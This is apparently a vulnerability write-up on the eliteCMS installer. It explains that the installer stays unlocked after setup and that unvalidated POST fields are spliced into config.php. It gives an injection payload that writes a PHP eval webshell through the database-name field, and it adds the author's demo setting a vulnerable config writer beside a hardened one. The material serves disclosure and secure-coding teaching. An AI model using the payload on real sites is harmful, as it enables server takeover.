eliteCMS does not lock its installer once installation has finished, so an attacker can re-run the whole installation simply by requesting the installer URL.
A second vulnerability: the installer can be made to write a one-line backdoor straight into admin/includes/config.php.
Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // the session values are interpolated verbatim into the generated PHP source
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "    die(\"Database connection failed\" .mysql_error());\n";
    $write .= "    \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "    die(\"Database select failed\" .mysql_error());\n";
    $write .= "    \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...
Now the code that populates those session values:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
The values are taken straight from the request without any validation.
If the database name field is POSTed as:

"?><?php eval($_POST[c]);?><?php

that string is spliced into the generated define() line, and a one-line backdoor is written into /admin/includes/config.php.
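Added example (my own code, not eliteCMS's): the two installer defects from this post, the missing install lock and the raw POST values spliced into config.php, shown as the vulnerable writer next to a hardened one. The install.lock file name, the identifier whitelist regex and the sample POST array are assumptions made for this demonstration.

```php
<?php
// Added example, not eliteCMS code. install.lock, the field regex and the
// sample POST array below are assumptions made for this demonstration.

// --- 1. Installer lock: refuse to run once setup has completed ------------
$lockFile = __DIR__ . '/install.lock';          // assumed lock-file name
if (file_exists($lockFile)) {
    header('HTTP/1.1 403 Forbidden');
    exit('Installer is locked; remove install.lock to re-run on purpose.');
}

// --- 2. Vulnerable writer: the pattern from the post, session values are
//        spliced verbatim into generated PHP source ------------------------
function write_config_vulnerable(array $s): string
{
    $w  = "<?php\n";
    $w .= "define(\"DB_SERVER\", \"{$s['DB_SERVER']}\");\n";
    $w .= "define(\"DB_NAME\", \"{$s['DB_NAME']}\");\n";
    $w .= "define(\"DB_USER\", \"{$s['DB_USER']}\");\n";
    $w .= "define(\"DB_PASS\", \"{$s['DB_PASS']}\");\n";
    return $w;
}

// --- 3. Hardened writer: whitelist the identifiers, then emit every value
//        through var_export() so it can only ever be a string literal -------
function validate_db_fields(array $post): array
{
    $clean = [];
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $k) {
        $v = isset($post[$k]) ? (string) $post[$k] : '';
        if ($k === 'DB_PASS') {
            // a password may contain any byte; var_export() escapes it below
            if (strlen($v) > 128) {
                throw new InvalidArgumentException("$k too long");
            }
        } elseif (!preg_match('/^[A-Za-z0-9_.\-]{1,64}$/', $v)) {
            // host, database and user names: letters, digits, _ . - only
            throw new InvalidArgumentException("$k contains disallowed characters");
        }
        $clean[$k] = $v;
    }
    return $clean;
}

function write_config_hardened(array $clean): string
{
    $w = "<?php\n";
    foreach ($clean as $k => $v) {
        // var_export() yields a single-quoted literal with ' and \ escaped,
        // so neither a PHP close tag nor a quote in $v can leave string context
        $w .= 'define(' . var_export($k, true) . ', ' . var_export($v, true) . ");\n";
    }
    return $w;   // no closing tag: nothing after it can leak as output
}

// --- Demo with the post's payload as the database name (constructed) ------
$post = [
    'DB_SERVER' => 'localhost',
    'DB_NAME'   => '"?><?php eval($_POST[c]);?><?php',
    'DB_USER'   => 'root',
    'DB_PASS'   => 's3cret"?>',
];

echo "vulnerable output:\n", write_config_vulnerable($post), "\n";
try {
    echo "hardened output:\n", write_config_hardened(validate_db_fields($post));
} catch (InvalidArgumentException $e) {
    echo "hardened writer rejected input: ", $e->getMessage(), "\n";
}

// With a clean DB_NAME the hardened writer still neutralises the odd password:
// it is emitted as a quoted literal and DB_PASS keeps its exact bytes.
$post['DB_NAME'] = 'elitecms';
echo "\nhardened output (clean name):\n",
     write_config_hardened(validate_db_fields($post));

// A real installer would then write atomically and drop the lock so that
// step=4 cannot be replayed:
// file_put_contents($file, $out, LOCK_EX);
// touch($lockFile);
```

Two practical notes. First, the regex whitelist is the layer that stops this bug class; var_export() is defence in depth for fields such as the password that cannot be whitelisted. Second, spliced into the define() line exactly as posted, the payload leaves `define("DB_NAME", ""` unterminated before its `?>`, so PHP reports a parse error on the generated config.php: the backdoor text is written to disk, but that particular file will not execute until the attacker adjusts the string, which is why the fix belongs in the writer and not in hoping the output stays broken.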